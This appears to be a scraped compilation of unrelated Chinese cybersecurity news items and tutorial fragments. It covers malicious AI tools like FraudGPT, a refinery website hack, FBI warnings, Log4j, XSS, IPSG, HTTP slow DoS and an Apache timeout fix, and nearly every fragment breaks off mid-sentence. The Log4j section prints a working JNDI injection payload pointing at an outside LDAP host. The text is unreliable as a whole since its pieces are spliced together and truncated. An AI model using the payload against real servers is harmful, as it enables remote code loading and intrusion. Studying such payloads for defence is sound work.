7月31日消息，研究人员担忧的“黑客利用 AI 打造犯罪工具”正逐步变为现实，IT之家早前曾报道，有黑客制作了一个“没有道德限制”的WormGPT聊天机器人，可以自动生成一系列钓鱼邮件。据安全公司 Netenrich 表示，如今又有黑客制造了一个名为FraudGPT 的恶意 AI 工具，据称“能够生成多种网络攻击代码”，“不到一周已经有逾3000名买家下单”。▲ 图源Netenrich公司▲ 图源 Netenrich 公司Netenrich公司研究员RakeshKrishnan声称，FraudGPT自7月22日以来，一直在暗网流通，订阅费用为每月200美元（约 1429.46元人民币）、六个月

以色列最大的炼油厂运营商BAZANGroup的网站遭遇黑客入侵，全球大范围宕机。BAZAN集团总部位于海法湾，前身为石油精炼厂有限公司，每年原油炼化规模约980万吨，年收入超135亿美元，员工超过1800人。BAZAN网站被切断网络上周末，BAZANGroup旗下网站BAZAN.co.il和eng.bazan.co.il无法进入，登入页面显示“请求超时”、“被公司的服务器拒绝”等字样。BleepingComputer证实，BAZANGroup全球各地的炼油厂网站均已无法访问。但经BleepingComputer测试，该集团网站可以从以色列境内访问，这可能是由于BAZAN已经实施了地理封锁的举措

7月31日消息，据pcmag报道，在本周五与记者的电话会议上，美国联邦调查局FBI就人工智能程序辅助的网络攻击泛滥发出了严厉的提醒和警告。据FBI称，使用AI技术进行网络钓鱼攻击或恶意软件开发的黑客数量正在以惊人的速度增加，而且他们的行动造成的影响只会越来越大。报道称，一位FBI高级官员表示：“我们预计，随着时间的推移，AI模型的应用越来越广泛，这些趋势也将会增加。”FBI没有透露犯罪分子正在使用的具体AI模型。但这位官员指出，黑客正在倾向于免费、可定制的开源模型，以及黑客私人开发的AI程序，这些程序在犯罪网络中收费流通。这位官员补充说，经验丰富的网络犯罪分子正在利用AI技术，开发新的恶意软件

log4j漏洞最早出现在2021年11月24日一位阿里安全团队的员工发现的，上报到Apache之后，12月10日凌晨才被公开。该漏洞威胁等级较高。基本比肩与阿里当年的fastjson漏洞。漏洞地址：1.漏洞原理：Log4j是一种流行的Java日志记录工具,其升级版本Log4j2存在安全漏洞。这个漏洞是由Log4j2的lookup功能引起的,该功能允许开发者使用某些协议读取环境配置。但是在实现这个功能时,未对输入进行严格检查,导致出现了安全漏洞。poc:${jndi:ldap://192.168.1.x:5678/test}以上就是一个简单的log4漏洞利用的poc，这里我们主要需要了解的就是这

80.前端安全-保护你的应用免受攻击的关键作为前端工程师，我们不仅需要关注用户界面的设计和功能实现，还需要关注应用程序的安全性。前端安全是保护我们的应用程序免受恶意攻击和数据泄露的重要方面。本文将介绍前端安全的概念、常见的安全威胁以及一些防御措施，帮助前端工程师提高应用程序的安全性。1.XSS（跨站脚本攻击）跨站脚本攻击（XSS）是一种常见的安全威胁，攻击者通过在网站上注入恶意脚本来窃取用户的敏感信息或篡改网页内容。常见的XSS攻击方式包括：**存储型XSS：**攻击者将恶意脚本存储到服务器数据库中，当用户访问包含该脚本的页面时，脚本会被执行。**反射型XSS：**攻击者构造恶意链接，用户点击

一、IPSG(IPSourceGuard):IP源防攻击1.1基于二层接口的源地址过滤技术1.2 防止恶意主机伪造合法主机的IP地址1.3 确保非授权主机不能通过自己制定IP来访问和攻击网络二、IPSG工作原理2.1 利用绑定表去匹配二层接口收到的IP报文，只有匹配绑定表才可以通过，否则丢弃三、IPSG绑定表两种方式：3.1静态绑定：使用user-bind命令手工配置3.2 动态绑定：配置DHCPSnooping(推荐）绑定表生产后，IPSG绑定表向指定的接口或VLAN下发ACL，由ACL来匹配IP报文四、IPSG案例（user-bind+DHCPSnooping）4.1 PC1-PC2连接S

云原生应用程序编程接口管理公司Kong联合外部经济学家的最新研究预计，截至2030年API攻击将激增 996%，意味着与API相关的网络威胁的频率和强度都显着升级。这项研究由Kong分析师和布朗大学副教授ChristopherWhaley博士合作进行，研究了使用API作为入口点的攻击；预计API攻击的频率将从2022年的1241次上升到本十年末的13608次。研究还揭示了API网络攻击的经济影响。截至2023年，安全漏洞的平均成本为 610万美元；这一数字不仅包括补救的直接成本，还包括因公司声誉受损而造成的巨大价值损失。研究预测，到2030年，这一平均成本将增至近 1450万美元，增幅95%。

1.声明：本文仅限学习研究讨论，切忌做非法乱纪之事！什么是HTTP慢速攻击？HTTP慢速攻击是利用HTTP合法机制，以极低的速度往服务器发送HTTP请求，尽量长时间保持连接，不释放，若是达到了WebServer对于并发连接数的上限，同时恶意占用的连接没有被释放，那么服务器端将无法接受新的请求，导致拒绝服务。简单来说，就是我们每次只发一行，每次发送之间的间隔时间很长，这迟迟未发送结束的HTTP包会占用服务端的资源，当达到服务端处理请求的上限时，这时候再用户对网站正常请求，服务端也处理不了了，导致了拒绝服务。HTTP慢速攻击也叫slowhttpattack，是一种DoS攻击的方式。目的消耗服务器的

最近的一项研究表明，很多企业在抵御针对企业高管的网络攻击方面缺乏准备。在数字化转型时代，企业高管是企业的中坚力量，他们做出关键决策，并引领企业走向成功。然而，企业高管的突出角色使他们成为寻求利用有价值数据和获取经济利益的网络犯罪分子的主要目标。在数字时代，企业高管在指导业务运营和决策的过程中发挥着关键作用。他们的职位使他们能够访问敏感信息，但这也让他们成为寻求有价值数据和经济利益的网络犯罪分子的主要目标。针对企业高管的网络攻击变得越来越普遍和复杂，不仅对个人本身，也对他们所领导的公司造成了严重后果。BlackCloak公司和Ponemon研究所在2023年4月进行的一项研究表明，约42%的企业

Apache在httpd.conf中添加LoadModulereqtimeout_modulemodules/mod_reqtimeout.so查看是否存在mod_reqtimeout.so模块[root@localhost~]#rpm-qlhttpd|grep.so/usr/lib64/httpd/modules/mod_reqtimeout.so添加配置[root@localhost~]#vi/etc/httpd/conf/httpd.confIfModulereqtimeout_module>RequestReadTimeoutheader=5-40,MinRate=500body=20